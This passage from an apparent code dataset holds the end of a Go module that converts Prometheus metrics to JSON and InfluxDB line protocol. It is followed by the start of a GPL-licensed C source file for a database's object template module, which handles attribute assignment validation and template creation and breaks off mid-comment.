family (defaults to expfmt.FmtProtoDelim).\nfunc EncodeExpfmt(mfs []*dto.MetricFamily, opts ...expfmt.Format) ([]byte, error) {\n\tformat := expfmt.FmtProtoDelim\n\tif len(opts) != 0 && opts[0] != \"\" {\n\t\tformat = opts[0]\n\t}\n\tbuf := &bytes.Buffer{}\n\tenc := expfmt.NewEncoder(buf, format)\n\tfor _, mf := range mfs {\n\t\tif err := enc.Encode(mf); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn buf.Bytes(), nil\n}\n\n// JSON encodes metric families into JSON.\ntype JSON struct{}\n\n// Encode encodes metrics JSON bytes. 
This not always works\n// as some prometheus values are NaN or Inf.\nfunc (j *JSON) Encode(mfs []*dto.MetricFamily) ([]byte, error) {\n\treturn EncodeJSON(mfs)\n}\n\n// DecodeJSON decodes a JSON array of metrics families.\nfunc DecodeJSON(r io.Reader) ([]*dto.MetricFamily, error) {\n\tdec := json.NewDecoder(r)\n\tfamilies := []*dto.MetricFamily{}\n\tfor {\n\t\tmfs := []*dto.MetricFamily{}\n\n\t\tif err := dec.Decode(&mfs); err == io.EOF {\n\t\t\tbreak\n\t\t} else if err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tfamilies = append(families, mfs...)\n\t}\n\treturn families, nil\n}\n\n// EncodeJSON encodes the metric families to JSON.\nfunc EncodeJSON(mfs []*dto.MetricFamily) ([]byte, error) {\n\treturn json.Marshal(mfs)\n}\n\nconst (\n\t// just in case the definition of time.Nanosecond changes from 1.\n\tnsPerMilliseconds = int64(time.Millisecond / time.Nanosecond)\n)\n\n// LineProtocol encodes metric families into influxdb line protocol.\ntype LineProtocol struct{}\n\n// Encode encodes metrics into line protocol format bytes.\nfunc (l *LineProtocol) Encode(mfs []*dto.MetricFamily) ([]byte, error) {\n\treturn EncodeLineProtocol(mfs)\n}\n\n// EncodeLineProtocol converts prometheus metrics into line protocol.\nfunc EncodeLineProtocol(mfs []*dto.MetricFamily) ([]byte, error) {\n\tvar b bytes.Buffer\n\n\tpts := points(mfs)\n\tfor _, p := range pts {\n\t\tif _, err := b.WriteString(p.String()); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif err := b.WriteByte('\\n'); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn b.Bytes(), nil\n}\n\nfunc points(mfs []*dto.MetricFamily) models.Points {\n\tpts := make(models.Points, 0, len(mfs))\n\tfor _, mf := range mfs {\n\t\tmts := make(models.Points, 0, len(mf.Metric))\n\t\tname := mf.GetName()\n\t\tfor _, m := range mf.Metric {\n\t\t\tts := tags(m.Label)\n\t\t\tfs := fields(mf.GetType(), m)\n\t\t\ttm := timestamp(m)\n\n\t\t\tpt, err := models.NewPoint(name, ts, fs, tm)\n\t\t\tif err != nil {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tmts = append(mts, pt)\n\t\t}\n\t\tpts = append(pts, mts...)\n\t}\n\n\treturn pts\n}\n\nfunc timestamp(m *dto.Metric) time.Time {\n\tvar tm time.Time\n\tif m.GetTimestampMs() > 0 {\n\t\ttm = time.Unix(0, m.GetTimestampMs()*nsPerMilliseconds)\n\t}\n\treturn tm\n\n}\n\nfunc tags(labels []*dto.LabelPair) models.Tags {\n\tts := make(models.Tags, len(labels))\n\tfor i, label := range labels {\n\t\tts[i] = models.NewTag([]byte(label.GetName()), []byte(label.GetValue()))\n\t}\n\treturn ts\n}\n\nfunc fields(typ dto.MetricType, m *dto.Metric) models.Fields {\n\tswitch typ {\n\tcase dto.MetricType_SUMMARY:\n\t\treturn summary(m.GetSummary())\n\tcase dto.MetricType_HISTOGRAM:\n\t\treturn histogram(m.GetHistogram())\n\tcase dto.MetricType_GAUGE:\n\t\treturn value(\"gauge\", m.GetGauge())\n\tcase dto.MetricType_COUNTER:\n\t\treturn value(\"counter\", m.GetCounter())\n\tcase dto.MetricType_UNTYPED:\n\t\treturn value(\"value\", m.GetUntyped())\n\tdefault:\n\t\treturn nil\n\t}\n}\n\nfunc summary(s *dto.Summary) map[string]interface{} {\n\tfields := make(map[string]interface{}, len(s.Quantile)+2)\n\tfor _, q := range s.Quantile {\n\t\tv := q.GetValue()\n\t\tif !math.IsNaN(v) {\n\t\t\tkey := strconv.FormatFloat(q.GetQuantile(), 'f', -1, 64)\n\t\t\tfields[key] = v\n\t\t}\n\t}\n\n\tfields[\"count\"] = float64(s.GetSampleCount())\n\tfields[\"sum\"] = float64(s.GetSampleSum())\n\treturn fields\n}\n\nfunc histogram(hist *dto.Histogram) map[string]interface{} {\n\tfields := make(map[string]interface{}, len(hist.Bucket)+2)\n\tfor _, b := range 
hist.Bucket {\n\t\tk := strconv.FormatFloat(b.GetUpperBound(), 'f', -1, 64)\n\t\tfields[k] = float64(b.GetCumulativeCount())\n\t}\n\n\tfields[\"count\"] = float64(hist.GetSampleCount())\n\tfields[\"sum\"] = float64(hist.GetSampleSum())\n\n\treturn fields\n}\n\ntype valuer interface {\n\tGetValue() float64\n}\n\nfunc value(typ string, m valuer) models.Fields {\n\tvs := make(models.Fields, 1)\n\n\tv := m.GetValue()\n\tif !math.IsNaN(v) {\n\t\tvs[typ] = v\n\t}\n\n\treturn vs\n}\n"} {"text": "/*\n * Copyright (C) 2008 Search Solution Corporation. All rights reserved by Search Solution.\n *\n * This program is free software; you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program; if not, write to the Free Software\n * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n *\n */\n\n/*\n * object_template.c - Object template module\n *\n * This contains code for attribute and method access, instance creation\n * and deletion, and misc utilitities related to instances.\n *\n */\n\n#ident \"$Id$\"\n\n#include \"config.h\"\n\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \"db.h\"\n#include \"dbtype.h\"\n#include \"error_manager.h\"\n#include \"system_parameter.h\"\n#include \"server_interface.h\"\n#include \"work_space.h\"\n#include \"object_domain.h\"\n#include \"object_primitive.h\"\n#include \"object_representation.h\"\n#include \"set_object.h\"\n#include \"class_object.h\"\n#include \"schema_manager.h\"\n#include \"object_accessor.h\"\n#include \"view_transform.h\"\n#include \"authenticate.h\"\n#include \"locator_cl.h\"\n#include \"virtual_object.h\"\n#include \"parser.h\"\n#include \"transaction_cl.h\"\n#include \"trigger_manager.h\"\n#include \"environment_variable.h\"\n#include \"transform.h\"\n#include \"execute_statement.h\"\n#include \"network_interface_cl.h\"\n\n#include \"dbtype.h\"\n\n#define OBJ_INTERNAL_SAVEPOINT_NAME \"*template-unique*\"\n\n/*\n * \t\t\tGLOBAL VARIABLES\n */\n/*\n * State used when creating templates, to indicate whether unique constraint\n * checking is enabled.\n * This state can be modifed using obt_enable_unique_checking()\n */\nbool obt_Check_uniques = true;\n\n/*\n * State variable used when creating object template, to indicate whether enable\n * auto increment feature\n */\nbool obt_Enable_autoincrement = true;\n\n/*\n * State variable used when generating AUTO_INCREMENT value,\n * to set the first generated AUTO_INCREMENT value as LAST_INSERT_ID.\n * It is only for client-side insertion.\n */\nbool obt_Last_insert_id_generated = false;\n\n/*\n * OBJECT MANAGER AREAS\n */\n\n/*\n * Template_area\n * Assignment_area\n *\n * Note :\n * Areas for the allocation of object templates and assignment\n * templates. 
Since these can be referenced by the interpreter,\n * we need to make sure that they serve as roots for the garbage\n * collector.\n *\n */\n\nstatic AREA *Template_area = NULL;\nstatic AREA *Assignment_area = NULL;\n\n/*\n * obj_Template_traversal\n *\n *\n */\n\nstatic unsigned int obj_Template_traversal = 0;\n/*\n * Must make sure template savepoints have unique names to allow for concurrent\n * or nested updates. Could be resetting this at db_restart() time.\n */\nstatic unsigned int template_savepoint_count = 0;\n\n\nstatic DB_VALUE *check_att_domain (SM_ATTRIBUTE * att, DB_VALUE * proposed_value);\nstatic int check_constraints (SM_ATTRIBUTE * att, DB_VALUE * value, unsigned force_check_not_null);\nstatic int quick_validate (SM_VALIDATION * valid, DB_VALUE * value);\nstatic void cache_validation (SM_VALIDATION * valid, DB_VALUE * value);\nstatic void begin_template_traversal (void);\nstatic OBJ_TEMPLATE *make_template (MOP object, MOP classobj);\nstatic int validate_template (OBJ_TEMPLATE * temp);\nstatic OBJ_TEMPASSIGN *obt_make_assignment (OBJ_TEMPLATE * template_ptr, SM_ATTRIBUTE * att);\nstatic void obt_free_assignment (OBJ_TEMPASSIGN * assign);\nstatic void obt_free_template (OBJ_TEMPLATE * template_ptr);\nstatic int populate_auto_increment (OBJ_TEMPLATE * template_ptr);\nstatic int populate_defaults (OBJ_TEMPLATE * template_ptr);\nstatic int obt_assign_obt (OBJ_TEMPLATE * template_ptr, SM_ATTRIBUTE * att, int base_assignment, OBJ_TEMPLATE * value);\nstatic MOP create_template_object (OBJ_TEMPLATE * template_ptr);\nstatic int access_object (OBJ_TEMPLATE * template_ptr, MOP * object, MOBJ * objptr);\nstatic int obt_convert_set_templates (SETREF * setref, int check_uniques);\nstatic int obt_final_check_set (SETREF * setref, int *has_uniques);\n\nstatic int obt_final_check (OBJ_TEMPLATE * template_ptr, int check_non_null, int *has_uniques);\nstatic int obt_apply_assignment (MOP op, SM_ATTRIBUTE * att, char *mem, DB_VALUE * value, int check_uniques);\nstatic int obt_apply_assignments (OBJ_TEMPLATE * template_ptr, int check_uniques, int level);\n\nstatic MOP make_temp_object (DB_OBJECT * class_, OBJ_TEMPLATE * object);\nstatic void free_temp_object (MOP obj);\n\n/*\n * obt_area_init\n * return: NO_ERROR or error code.\n *\n */\n\nint\nobt_area_init (void)\n{\n Template_area = area_create (\"Object templates\", sizeof (OBJ_TEMPLATE), 32);\n if (Template_area == NULL)\n {\n goto error;\n }\n\n Assignment_area = area_create (\"Assignment templates\", sizeof (OBJ_TEMPASSIGN), 64);\n if (Assignment_area == NULL)\n {\n goto error;\n }\n\n return NO_ERROR;\n\nerror:\n obt_area_final ();\n\n assert (er_errid () != NO_ERROR);\n\n return er_errid ();\n}\n\n/*\n * obt_area_final\n * return: NO_ERROR or error code.\n *\n */\nvoid\nobt_area_final (void)\n{\n if (Template_area != NULL)\n {\n area_destroy (Template_area);\n Template_area = NULL;\n }\n\n if (Assignment_area != NULL)\n {\n area_destroy (Assignment_area);\n Assignment_area = NULL;\n }\n}\n\n/*\n * obt_find_attribute - locate an attribute for a template.\n * return: error code\n * template(in) :\n * use_base_class(in) :\n * name(in): attribute name\n * attp(out): returned pointer to attribute descriptor\n *\n * Note:\n * This is a bit simpler than the others since we have the class\n * cached in the template.\n *\n */\n\nint\nobt_find_attribute (OBJ_TEMPLATE * template_ptr, int use_base_class, const char *name, SM_ATTRIBUTE ** attp)\n{\n int error = NO_ERROR;\n MOP classobj;\n SM_CLASS *class_, *upgrade_class;\n SM_ATTRIBUTE *att;\n\n 
att = NULL;\n\n class_ = (use_base_class) ? template_ptr->base_class : template_ptr->class_;\n\n att = classobj_find_attribute (class_, name, template_ptr->is_class_update);\n\n if (att != NULL && att->header.name_space == ID_SHARED_ATTRIBUTE)\n {\n /*\n * Sigh, when we originally fetched the class, it was fetched\n * with a read lock since we weren't sure of the intent. Now\n * that we know we're about to update a shared attribute, we need to\n * upgrade the lock to a write lock. We could use AU_FETCH_WRITE\n * here rather than AU_FETCH_UPDATE and use locator_update_class later\n * when we're sure the template can be applied without error.\n */\n if (!template_ptr->write_lock)\n\t{\n\t classobj = ((use_base_class) ? template_ptr->base_classobj : template_ptr->classobj);\n\n\t error = au_fetch_class (classobj, &upgrade_class, AU_FETCH_UPDATE, AU_ALTER);\n\t template_ptr->write_lock = !error;\n\n\t /*\n\t * This better damn well not re-fetch the class.\n\t * If this can happen, we'll need a general \"recache\" function\n\t * for the template.\n\t */\n\t if (class_ != upgrade_class)\n\t {\n\t error = ER_OBJ_TEMPLATE_INTERNAL;\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, error, 0);\n\t }\n\t}\n }\n\n if (error == NO_ERROR && att == NULL)\n {\n ERROR1 (error, ER_OBJ_INVALID_ATTRIBUTE, name);\n }\n\n *attp = att;\n return error;\n}\n\n/*\n *\n * ASSIGNMENT VALIDATION\n *\n *\n */\n\n/*\n * check_att_domain - This checks to see if a value is within the domain of an\n * attribute.\n *\n * returns: actual value container\n * att(in): attribute name (for error messages)\n * proposed_value(in): original value container\n *\n * Note:\n * It calls tp_domain_check & tp_domain_coerce to do the work, this\n * function mostly serves to inerpret the return codes and set an\n * appropriate error condition.\n *\n */\n\nstatic DB_VALUE *\ncheck_att_domain (SM_ATTRIBUTE * att, DB_VALUE * proposed_value)\n{\n TP_DOMAIN_STATUS status;\n DB_VALUE *value;\n int is_ref = 0;\n\n value = proposed_value;\n\n is_ref = pt_is_reference_to_reusable_oid (value);\n if (is_ref < 0)\n {\n return NULL;\n }\n if (is_ref > 0)\n {\n er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_REFERENCE_TO_NON_REFERABLE_NOT_ALLOWED, 0);\n return NULL;\n }\n\n /*\n * Note that we set the \"exact\" match flag true to disallow \"tolerance\"\n * matches. Some types (such as CHAR) may appear to overflow the domain,\n * but can be truncated during the coercion process.\n */\n status = tp_domain_check (att->domain, value, TP_EXACT_MATCH);\n\n if (status != DOMAIN_COMPATIBLE)\n {\n value = pr_make_ext_value ();\n if (value == NULL)\n\t{\n\t return NULL;\n\t}\n status = tp_value_cast (proposed_value, value, att->domain, !TP_IS_CHAR_TYPE (TP_DOMAIN_TYPE (att->domain)));\n if (status != DOMAIN_COMPATIBLE)\n\t{\n\t (void) pr_free_ext_value (value);\n\t}\n }\n\n if (status != DOMAIN_COMPATIBLE)\n {\n switch (status)\n\t{\n\tcase DOMAIN_ERROR:\n\t /* error has already been set */\n\t break;\n\tcase DOMAIN_OVERFLOW:\n\t if (TP_IS_BIT_TYPE (DB_VALUE_DOMAIN_TYPE (proposed_value)))\n\t {\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_STRING_OVERFLOW, 2, att->header.name,\n\t\t att->domain->precision);\n\t }\n\t else\n\t {\n\t (void) tp_domain_status_er_set (status, ARG_FILE_LINE, proposed_value, att->domain);\n\t assert (er_errid () != NO_ERROR);\n\t }\n\t break;\n\tcase DOMAIN_INCOMPATIBLE:\n\tdefault:\n\t /*\n\t * the default case shouldn't really be encountered, might want to\n\t * signal a different error. 
The OVERFLOW case should only\n\t * be returned during coercion which wasn't requested, to be safe,\n\t * treat these like a domain conflict. Probably need a more generic\n\t * domain conflict error that uses full printed representations\n\t * of the entire domain.\n\t */\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_DOMAIN_CONFLICT, 1, att->header.name);\n\t break;\n\t}\n\n /* return NULL if incompatible */\n value = NULL;\n }\n\n return value;\n}\n\n/*\n * check_constraints - This function is used to check a proposed value\n * against the integrity constraints defined\n * for an attribute.\n *\n * returns: error code\n *\n * att(in): attribute descriptor\n * value(in): value to verify\n * force_check_not_null(in): force NOT NULL constraint check\n *\n * Note:\n * If will return an error code if any of the constraints are violated.\n *\n */\n\nstatic int\ncheck_constraints (SM_ATTRIBUTE * att, DB_VALUE * value, unsigned force_check_not_null)\n{\n int error = NO_ERROR;\n MOP mop;\n\n /* check NOT NULL constraint */\n if (value == NULL || DB_IS_NULL (value)\n || (att->domain->type == tp_Type_object && (mop = db_get_object (value)) && WS_MOP_IS_NULL (mop)))\n {\n if (att->flags & SM_ATTFLAG_NON_NULL)\n\t{\n\t if ((att->flags & SM_ATTFLAG_AUTO_INCREMENT) && !force_check_not_null)\n\t {\n\t assert (DB_IS_NULL (value));\n\t assert (att->domain->type != tp_Type_object);\n\n\t /* This is allowed to happen only during INSERT statements, since the next serial value will be filled in\n\t * at a later time. For other cases, the force_check_not_null flag should be set. */\n\t }\n\t else\n\t {\n\t ERROR1 (error, ER_OBJ_ATTRIBUTE_CANT_BE_NULL, att->header.name);\n\t }\n\t}\n }\n else\n {\n /* Check size constraints */\n if (tp_check_value_size (att->domain, value) != DOMAIN_COMPATIBLE)\n\t{\n\t /* probably need an error message that isn't specific to \"string\" types */\n\t ERROR2 (error, ER_OBJ_STRING_OVERFLOW, att->header.name, att->domain->precision);\n\t}\n }\n\n return error;\n}\n\n/*\n * quick_validate - This function is where we try to determine as fast as\n * possible if a value is compatible with\n * a certain attribute's domain.\n * returns: non-zero if the value is known to be valid\n * valid(in): validation cache\n * value(in): value to ponder\n */\n\nstatic int\nquick_validate (SM_VALIDATION * valid, DB_VALUE * value)\n{\n int is_valid;\n DB_TYPE type;\n\n if (valid == NULL || value == NULL)\n return 0;\n\n is_valid = 0;\n type = DB_VALUE_TYPE (value);\n\n switch (type)\n {\n case DB_TYPE_OBJECT:\n {\n\tDB_OBJECT *obj, *class_;\n\n\tobj = db_get_object (value);\n\tif (obj != NULL)\n\t {\n\t class_ = db_get_class (obj);\n\t if (class_ != NULL)\n\t {\n\t\tif (class_ == valid->last_class)\n\t\t {\n\t\t is_valid = 1;\n\t\t }\n\t\telse\n\t\t {\n\t\t /* wasn't on the first level cache, check the list */\n\t\t is_valid = ml_find (valid->validated_classes, class_);\n\t\t /* if its on the list, auto select this for the next time around */\n\t\t if (is_valid)\n\t\t {\n\t\t\tvalid->last_class = class_;\n\t\t }\n\t\t }\n\t }\n\t }\n }\n break;\n\n case DB_TYPE_SET:\n case DB_TYPE_MULTISET:\n case DB_TYPE_SEQUENCE:\n {\n\tDB_SET *set;\n\tDB_DOMAIN *domain;\n\n\tset = db_get_set (value);\n\tdomain = set_get_domain (set);\n\tif (domain == valid->last_setdomain)\n\t {\n\t is_valid = 1;\n\t }\n }\n break;\n\n case DB_TYPE_CHAR:\n case DB_TYPE_NCHAR:\n case DB_TYPE_VARCHAR:\n case DB_TYPE_VARNCHAR:\n if (type == valid->last_type && DB_GET_STRING_PRECISION (value) == valid->last_precision)\n\t{\n\t 
is_valid = 1;\n\t}\n break;\n\n case DB_TYPE_BIT:\n case DB_TYPE_VARBIT:\n if (type == valid->last_type && DB_GET_BIT_PRECISION (value) == valid->last_precision)\n\t{\n\t is_valid = 1;\n\t}\n break;\n\n case DB_TYPE_NUMERIC:\n if (type == valid->last_type && DB_GET_NUMERIC_PRECISION (value) == valid->last_precision\n\t && DB_GET_NUMERIC_SCALE (value) == valid->last_scale)\n\t{\n\t is_valid = 1;\n\t}\n break;\n\n default:\n if (type == valid->last_type)\n\t{\n\t is_valid = 1;\n\t}\n break;\n }\n\n return is_valid;\n}\n\n/*\n * cache_validation\n * return : none\n * valid(in): validation cache\n * value(in): value known to be good\n *\n * Note:\n * Caches information about the data value in the validation cache\n * so hopefully we'll be quicker about validating values of this\n * form if we find them again.\n *\n */\n\nstatic void\ncache_validation (SM_VALIDATION * valid, DB_VALUE * value)\n{\n DB_TYPE type;\n\n if (valid == NULL || value == NULL)\n {\n return;\n }\n\n type = DB_VALUE_TYPE (value);\n switch (type)\n {\n case DB_TYPE_OBJECT:\n {\n\tDB_OBJECT *obj, *class_;\n\n\tobj = db_get_object (value);\n\tif (obj != NULL)\n\t {\n\t class_ = db_get_class (obj);\n\t if (class_ != NULL)\n\t {\n\t\tvalid->last_class = class_;\n\t\t/*\n\t\t * !! note that we have to be building an external object list\n\t\t * here so these serve as GC roots. This is kludgey, we should\n\t\t * be encapsulating structure rules inside cl_ where the\n\t\t * SM_VALIDATION is allocated.\n\t\t */\n\t\t(void) ml_ext_add (&valid->validated_classes, class_, NULL);\n\t }\n\t }\n }\n break;\n\n case DB_TYPE_SET:\n case DB_TYPE_MULTISET:\n case DB_TYPE_SEQUENCE:\n {\n\tDB_SET *set;\n\n\tset = db_get_set (value);\n\tvalid->last_setdomain = set_get_domain (set);\n }\n break;\n\n case DB_TYPE_CHAR:\n case DB_TYPE_NCHAR:\n case DB_TYPE_VARCHAR:\n case DB_TYPE_VARNCHAR:\n case DB_TYPE_BIT:\n case DB_TYPE_VARBIT:\n valid->last_type = type;\n valid->last_precision = db_value_precision (value);\n valid->last_scale = 0;\n break;\n\n case DB_TYPE_NUMERIC:\n valid->last_type = type;\n valid->last_precision = db_value_precision (value);\n valid->last_scale = db_value_scale (value);\n break;\n\n default:\n valid->last_type = type;\n valid->last_precision = 0;\n valid->last_scale = 0;\n break;\n }\n}\n\n/*\n * obt_check_assignment - This is the main validation routine\n * for attribute assignment.\n * returns: value container\n * att(in): attribute descriptor\n * proposed_value(in): value to assign\n * valid(in):\n * force_check_not_null(in): force check for NOT NULL\n * constraints\n *\n *\n * Note:\n * It is used both by the direct assignment function obj_set and also\n * by object templates (which do grouped assignments). Any other function\n * that does attribute value assignment should also use this function\n * or be VERY careful about the rules contained here.\n * The check_unique flag is normally turned on only if we're building\n * an object template because we have to check for constraint violation\n * before allowing the rest of the template to be built. For immediate\n * attribute assignment (not using templates) we delay the checking for\n * unique constraints until later (in assign_value) so we only have to\n * do one server call instead of two. 
Would be nice if templates could\n * have a way to \"batch up\" their unique attribute checks.\n * This function will return NULL if an error was detected.\n * It will return the propsed_value pointer if the assignment is\n * acceptable.\n * It will return a new value container if the proposed_value wasn't\n * acceptable but it was coerceable to a valid value.\n * The caller must check to see if the returned value is different\n * and if so free it with pr_free_ext_value() when done.\n *\n */\n\nDB_VALUE *\nobt_check_assignment (SM_ATTRIBUTE * att, DB_VALUE * proposed_value, SM_VALIDATION * valid,\n\t\t unsigned force_check_not_null)\n{\n DB_VALUE *value;\n\n /* assume this will be ok */\n value = proposed_value;\n\n /* for simplicity, convert this into a container with a NULL type */\n if (value == NULL)\n {\n value = pr_make_ext_value ();\n }\n else\n {\n /*\n * before we make the expensive checks, see if we've got some cached\n * validation information handy\n */\n if (!quick_validate (valid, value))\n\t{\n\t value = check_att_domain (att, proposed_value);\n\t if (value != NULL)\n\t {\n\t if (check_constraints (att, value, force_check_not_null) != NO_ERROR)\n\t\t{\n\t\t if (value != proposed_value)\n\t\t {\n\t\t (void) pr_free_ext_value (value);\n\t\t }\n\t\t value = NULL;\n\t\t}\n\t else\n\t\t{\n\t\t /*\n\t\t * we're ok, if there was no coercion required, remember this for\n\t\t * next time.\n\t\t */\n\t\t if (value == proposed_value)\n\t\t {\n\t\t cache_validation (valid, proposed_value);\n\t\t }\n\t\t}\n\t }\n\t}\n }\n\n return value;\n}\n\n/*\n *\n * OBJECT TEMPLATE ASSIGNMENT\n *\n *\n */\n\n\n/*\n * begin_template_traversal - This \"allocates\" the traversal counter\n * for a new template traversal.\n * return : none\n *\n * Note :\n * obj_Template_traversal is set to this value so it can\n * be tested during traversal.\n * This is in a function just so that the rules for skipping a traversal\n * value of zero can be encapsulated.\n *\n */\n\nstatic void\nbegin_template_traversal (void)\n{\n /* increment the counter */\n obj_Template_traversal++;\n\n /* don't let it be zero */\n if (obj_Template_traversal == 0)\n {\n obj_Template_traversal++;\n }\n}\n\n/*\n * make_template - This initializes a new object template.\n * return: new object template\n * object(in): the object that the template is being created for\n * classobj(in): the class of the object\n *\n */\n\nstatic OBJ_TEMPLATE *\nmake_template (MOP object, MOP classobj)\n{\n OBJ_TEMPLATE *template_ptr;\n AU_FETCHMODE mode;\n AU_TYPE auth;\n SM_CLASS *class_, *base_class;\n MOP base_classobj, base_object;\n MOBJ obj;\n OBJ_TEMPASSIGN **vec;\n\n base_classobj = NULL;\n base_class = NULL;\n base_object = NULL;\n\n /* fetch & lock the class with the appropriate options */\n mode = AU_FETCH_READ;\n if (object == NULL)\n {\n auth = AU_INSERT;\n }\n else if (object != classobj)\n {\n auth = AU_UPDATE;\n }\n else\n {\n /*\n * class variable update\n * NOTE: It might be good to use AU_FETCH_WRITE here and then\n * use locator_update_class to set the dirty bit after the template\n * has been successfully applied.\n */\n mode = AU_FETCH_UPDATE;\n auth = AU_ALTER;\n }\n\n if (au_fetch_class (classobj, &class_, mode, auth))\n {\n return NULL;\n }\n\n\n /*\n * we only need to keep track of the base class if this is a\n * virtual class, for proxies, the instances look like usual\n */\n\n if (class_->class_type == SM_VCLASS_CT\t/* a view, and... 
*/\n && object != classobj /* we are not doing a meta class update */ )\n {\n /*\n * could use vid_is_updatable() if\n * the instance was supplied but since this can be NULL for\n * insert templates, use mq_is_updatable on the class object instead.\n * NOTE: Don't call this yet, try to use mq_fetch_one_real_class()\n * to perform the updatability test.\n */\n if (!mq_is_updatable (classobj))\n\t{\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_IT_NOT_UPDATABLE_STMT, 0);\n\t return NULL;\n\t}\n\n\n base_classobj = mq_fetch_one_real_class (classobj);\n if (base_classobj == NULL)\n\t{\n\t er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_IT_NOT_UPDATABLE_STMT, 0);\n\t return NULL;\n\t}\n\n if (au_fetch_class (base_classobj, &base_class, AU_FETCH_READ, auth))\n\t{\n\t return NULL;\n\t}\n\n /* get the associated base object (if this isn't a proxy) */\n if (object != NULL && !vid_is_base_instance (object))\n\t{\n\t base_object = vid_get_referenced_mop (object);\n\t}\n }\n\n /*\n * If this is an instance update, fetch & lock the instance.\n * NOTE: It might be good to use AU_FETCH_WRITE and use locator_update_instance\n * to set the dirty bit after the template has been successfully applied.\n *\n * If this is a virtual instance on a non-proxy, could be locking\n * the associated instance as well. Is this already being done ?\n */\n if (object != NULL && object != classobj)\n {\n if (au_fetch_instance (object, &obj, AU_FETCH_UPDATE, LC_FETCH_MVCC_VERSION, AU_UPDATE))\n\t{\n\t return NULL;\n\t}\n\n /*\n * Could cache the object memory pointer this in the template as\n * well but that would require that it be pinned for a long\n * duration through code that we don't control. Dangerous.\n */\n }\n\n template_ptr = (OBJ_TEMPLATE *) area_alloc (Template_area);\n if (template_ptr != NULL)\n {\n template_ptr->object = object;\n template_ptr->classobj = classobj;\n\n /*\n * cache the class info directly in the template, will need\n * to remember the transaction id and chn for validation\n */\n template_ptr->class_ = class_;\n\n /* cache the base class if this is a virtual class template */\n template_ptr->base_classobj = base_classobj;\n template_ptr->base_class = base_class;\n template_ptr->base_object = base_object;\n\n template_ptr->tran_id = tm_Tran_index;\n template_ptr->schema_id = sm_local_schema_version ();\n template_ptr->assignments = NULL;\n template_ptr->label = NULL;\n template_ptr->traversal = 0;\n template_ptr->write_lock = mode != AU_FETCH_READ;\n template_ptr->traversed = 0;\n template_ptr->is_old_template = 0;\n template_ptr->is_class_update = (object == classobj);\n template_ptr->check_uniques = obt_Check_uniques;\n if (TM_TRAN_ISOLATION () >= TRAN_REPEATABLE_READ)\n\t{\n\t template_ptr->check_serializable_conflict = 1;\n\t}\n else\n\t{\n\t template_ptr->check_serializable_conflict = 0;\n\t}\n template_ptr->uniques_were_modified = 0;\n template_ptr->function_key_modified = 0;\n\n template_ptr->shared_was_modified = 0;\n template_ptr->discard_on_finish = 1;\n template_ptr->fkeys_were_modified = 0;\n template_ptr->force_check_not_null = 0;\n template_ptr->force_flush = 0;\n template_ptr->is_autoincrement_set = 0;\n template_ptr->pruning_type = DB_NOT_PARTITIONED_CLASS;\n /*\n * Don't do this until we've initialized the other stuff;\n * OTMPL_NASSIGNS relies on the \"class\" attribute of the template.\n */\n\n if (template_ptr->is_class_update)\n\t{\n\t template_ptr->nassigns = template_ptr->class_->class_attribute_count;\n\t}\n else\n\t{\n\t template_ptr->nassigns = 
(template_ptr->class_->att_count + template_ptr->class_->shared_count);\n\t}\n\n vec = NULL;\n if (template_ptr->nassigns)\n\t{\n\t int i;\n\n\t vec = (OBJ_TEMPASSIGN **) malloc (template_ptr->nassigns * sizeof (OBJ_TEMPASSIGN *));\n\t if (!vec)\n\t {\n\t return NULL;\n\t }\n\t for (i = 0; i < template_ptr->nassigns; i++)\n\t {\n\t vec[i] = NULL;\n\t }\n\t}\n\n template_ptr->assignments = vec;\n }\n\n return template_ptr;\n}\n\n/*\n * validate_template - This is used to validate a template before each operation\n * return: error code\n * temp(in): template to validate\n *\n */\n\nstatic int\nvalidate_template (OBJ_TEMPLATE * temp)\n{\n int error = NO_ERROR;\n\n if (temp != NULL && (temp->tran_id != tm_Tran_index || temp->schema_id != sm_local_schema_version ()))\n {\n error = ER_OBJ_INVALID_TEMPLATE;\n er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, error, 0);\n }\n\n return error;\n}\n\n/*\n * obt_make_assignment - This initializes a new assignment template.\n * return: template assignment structure\n * template(in):\n * att(in):\n *\n * Note:\n * It also adds it to a containing template.\n */\n\nstatic OBJ_TEMPASSIGN *\nobt_make_assignment (OBJ_TEMPLATE * template_ptr, SM_ATTRIBUTE * att)\n{\n OBJ_TEMPASSIGN *assign;\n\n assign = (OBJ_TEMPASSIGN *) area_alloc (Assignment_area);\n if (assign != NULL)\n {\n assign->obj = NULL;\n assign->variable = NULL;\n assign->att = att;\n assign->old_value = NULL;\n assign->is_default = 0;\n assign->is_auto_increment = 0;\n\n template_ptr->assignments[att->order] = assign;\n if (classobj_has_unique_constraint (att->constraints))\n\t{\n\t template_ptr->uniques_were_modified = 1;\n\t}\n if (att->header.name_space == ID_SHARED_ATTRIBUTE)\n\t{\n\t template_ptr->shared_was_modified = 1;\n\t}\n\n if (classobj_get_cached_constraint (att->constraints, SM_CONSTRAINT_FOREIGN_KEY, NULL))\n\t{\n\t template_ptr->fkeys_were_modified = 1;\n\t}\n if (classobj_has_function_constraint (att->constraints))\n\t{\n\t template_ptr->function_key_modified = 1;\n\t}\n }\n\n return assign;\n}\n\n/*\n * obt_free_assignment - Work function for obt_free_template.\n * return: none\n * assign(in): an assignment template\n *\n * Note 